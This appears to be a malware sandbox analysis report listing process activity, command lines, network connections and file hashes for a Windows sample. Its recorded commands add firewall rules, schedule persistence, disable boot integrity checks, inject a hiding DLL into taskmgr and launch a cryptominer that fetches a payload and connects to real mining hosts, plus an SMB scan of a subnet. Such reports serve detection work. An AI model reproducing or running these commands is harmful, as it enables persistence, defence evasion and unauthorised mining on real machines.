PID 2604 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
PID 2604 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
PID 2604 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
PID 2456 wrote to memory of 2432 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 2456 wrote to memory of 2432 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 2456 wrote to memory of 2432 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 2456 wrote to memory of 2432 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 1424 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 2456 wrote to memory of 1616 N/A C:\Windows\rss\csrss.exe C:\Windows\system32\bcdedit.exe
PID 2456 wrote to memory of 1616 N/A C:\Windows\rss\csrss.exe C:\Windows\system32\bcdedit.exe
PID 2456 wrote to memory of 1616 N/A C:\Windows\rss\csrss.exe C:\Windows\system32\bcdedit.exe
PID 2456 wrote to memory of 1616 N/A C:\Windows\rss\csrss.exe C:\Windows\system32\bcdedit.exe
PID 2456 wrote to memory of 2668 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
PID 2456 wrote to memory of 2668 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
PID 2456 wrote to memory of 2668 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
PID 2456 wrote to memory of 2668 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
PID 2792 wrote to memory of 1324 N/A C:\Windows\windefender.exe C:\Windows\SysWOW64\cmd.exe
PID 2792 wrote to memory of 1324 N/A C:\Windows\windefender.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe

"C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240307045316.log C:\Windows\Logs\CBS\CbsPersist_20240307045316.cab

C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe

"C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id c7dcfc48-876d-495c-9c26-800030885822 --tls --nicehash -o showlock.net:443 --rig-id c7dcfc48-876d-495c-9c26-800030885822 --tls --nicehash -o showlock.net:80 --rig-id c7dcfc48-876d-495c-9c26-800030885822 --nicehash --http-port 3433 --http-access-token c7dcfc48-876d-495c-9c26-800030885822 --randomx-wrmsr=-1

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe -hide 320

Network

Country Destination Domain Proto
US 8.8.8.8:53 c7dcfc48-876d-495c-9c26-800030885822.uuid.dumppage.org udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 8.8.8.8:53 server14.dumppage.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.ipfire.org udp
BG 185.82.216.111:443 server14.dumppage.org tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
DE 81.3.27.44:3478 stun.ipfire.org udp
US 8.8.8.8:53 carsalessystem.com udp
US 104.21.94.82:443 carsalessystem.com tcp
BG 185.82.216.111:443 server14.dumppage.org tcp
BG 185.82.216.111:443 server14.dumppage.org tcp
BG 185.82.216.111:443 server14.dumppage.org tcp
N/A 127.0.0.1:31465 tcp
BG 185.82.216.111:443 server14.dumppage.org tcp
BG 185.82.216.111:443 server14.dumppage.org tcp
US 104.21.94.82:443 carsalessystem.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 trythisgid.com udp
CZ 46.8.8.100:443 trythisgid.com tcp
US 8.8.8.8:53 udp
US 199.59.243.225:80 ww82.trythisgid.com tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.52:445 tcp
US 8.8.8.8:53 showlock.net udp
NL 190.2.153.202:40001 showlock.net tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.91:445 tcp
US 8.8.8.8:53 stun.ipfire.org udp
DE 81.3.27.44:3478 stun.ipfire.org udp
US 8.8.8.8:53 snickerfool.com udp
NL 80.79.4.25:80 snickerfool.com tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.135:445 tcp
NL 80.79.4.25:80 snickerfool.com tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.255:445 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.1.0:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.1.24:445 tcp
N/A 10.127.1.22:445 tcp
N/A 10.127.1.15:445 tcp
N/A 10.127.1.16:445 tcp
N/A 10.127.1.27:445 tcp
N/A 10.127.1.48:445 tcp
N/A 10.127.1.5:445 tcp
N/A 10.127.1.2:445 tcp
N/A 10.127.1.39:445 tcp
N/A 10.127.1.26:445 tcp
N/A 10.127.1.49:445 tcp
N/A 10.127.1.53:445 tcp
N/A 10.127.1.12:445 tcp
N/A 10.127.1.40:445 tcp
N/A 10.127.1.58:445 tcp
N/A 10.127.1.1:445 tcp
N/A 10.127.1.30:445 tcp
N/A 10.127.1.45:445 tcp
N/A 10.127.1.57:445 tcp
N/A 10.127.1.8:445 tcp
N/A 10.127.1.43:445 tcp
N/A 10.127.1.23:445 tcp
N/A 10.127.1.34:445 tcp
N/A 10.127.1.46:445 tcp
N/A 10.127.1.29:445 tcp
N/A 10.127.1.44:445 tcp
N/A 10.127.1.63:445 tcp
N/A 10.127.1.20:445 tcp
N/A 10.127.1.28:445 tcp
N/A 10.127.1.7:445 tcp
N/A 10.127.1.56:445 tcp
N/A 10.127.1.9:445 tcp
N/A 10.127.1.54:445 tcp
N/A 10.127.1.47:445 tcp
N/A 10.127.1.62:445 tcp
N/A 10.127.1.33:445 tcp
N/A 10.127.1.25:445 tcp
N/A 10.127.1.31:445 tcp
N/A 10.127.1.55:445 tcp
N/A 10.127.1.3:445 tcp
N/A 10.127.1.4:445 tcp
N/A 10.127.1.35:445 tcp
N/A 10.127.1.41:445 tcp
N/A 10.127.1.60:445 tcp
N/A 10.127.1.51:445 tcp
N/A 10.127.1.36:445 tcp
N/A 10.127.1.11:445 tcp
N/A 10.127.1.18:445 tcp
N/A 10.127.1.6:445 tcp
N/A 10.127.1.13:445 tcp
N/A 10.127.1.19:445 tcp
N/A 10.127.1.64:445 tcp
N/A 10.127.1.61:445 tcp
N/A 10.127.1.32:445 tcp
N/A 10.127.1.17:445 tcp
N/A 10.127.1.37:445 tcp
N/A 10.127.1.52:445 tcp

Files

memory/2384-0-0x00000000038A0000-0x0000000003C98000-memory.dmp

memory/2384-1-0x00000000038A0000-0x0000000003C98000-memory.dmp

memory/2384-2-0x0000000003CA0000-0x000000000458B000-memory.dmp

memory/2384-3-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2604-4-0x00000000036A0000-0x0000000003A98000-memory.dmp

memory/2604-6-0x00000000036A0000-0x0000000003A98000-memory.dmp

memory/2384-8-0x00000000038A0000-0x0000000003C98000-memory.dmp

memory/2604-7-0x0000000003AA0000-0x000000000438B000-memory.dmp

memory/2384-5-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2604-9-0x0000000000400000-0x0000000001E11000-memory.dmp

\Windows\rss\csrss.exe

MD5 ced1f3fc34f2a39270d7db5883fe8a1f
SHA1 2f207b86cbd8397b183c3feb774eb279f0d76263
SHA256 192346281d3b063cf570a32f88571b3f896872b36eecb4bda049ac684d34b227
SHA512 406dc13f017b7a75039c0d49bd821d4cebcc04fa4b455f758eb68819e8f0c72e1a3635afe8cafc3a04a4eb64d026458bb14c49cb4f124fc8f67eac628eb4e252

\Windows\rss\csrss.exe

MD5 0d50ddc52c14259fb37b12c07ea701ee
SHA1 0b0e6794762b271e52bc5a9f88d48762bb49de30
SHA256 9384c9bdfe40941751b78aadd4ca74b9a0179964736a45fc6c2a19c0ddf11f18
SHA512 a3e44008182a89b0f037b0ff06c588a05e13eaae1f962e88c2c272a076a91e033f86fbc271d0f2446b2ddfe5ebca885ac77af3990cd53bf2373a69ed4290a6f1

C:\Windows\rss\csrss.exe

MD5 153ce197b14e4483ecf3188b57c414f0
SHA1 e01fcef3278b6ac4e30024d97fe8fc91ff24be59
SHA256 b475cb7d45dfa2879c8d42b452dc5b1d6c3eaa32e83bd5f4cb11065e0fadae86
SHA512 4668df36ca957863010fee345f8a7403dd3faf072dce637ab502488119fec0b98a4839906954a2c01099983f8dd819109f631a167f8ec21575eb6c9b37280416

memory/2456-19-0x0000000003890000-0x0000000003C88000-memory.dmp

memory/2604-18-0x0000000000400000-0x0000000001E11000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 374a90da1a6547f00f47d1cb5bce6297
SHA1 b38a83b09e4931ff7089b497f2b3676ab537faf8
SHA256 57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f
SHA512 07cb2eb4f98cdf5e09db509186a5b7b18975c4ef000ce7247711bb35f5fc536f70d05420992312926c860123af017a7b2e341a99d74ca1eadfd11397f4ac7705

memory/2456-20-0x0000000003890000-0x0000000003C88000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 9ebc3622c50d655d4a44d52276c1575a
SHA1 e437cb22e12b360e48bd0e116f4f2f684ac55796
SHA256 b3e464d1dcc4a347875011b0a68c5fe0860f3be4a3885d033be4eb340d1563a3
SHA512 0eefdac60c5fc9a97c8655f58c962f9ab9fc0cffa26eb4e74d57360d383eca0af6b7d7b83e227b4863d4cb8547578496a14174cc3e86c360bfa0599d2f7af4f4

memory/2456-22-0x0000000000400000-0x0000000001E11000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 07483f2923c79c176f3e7ce5e2fe2add
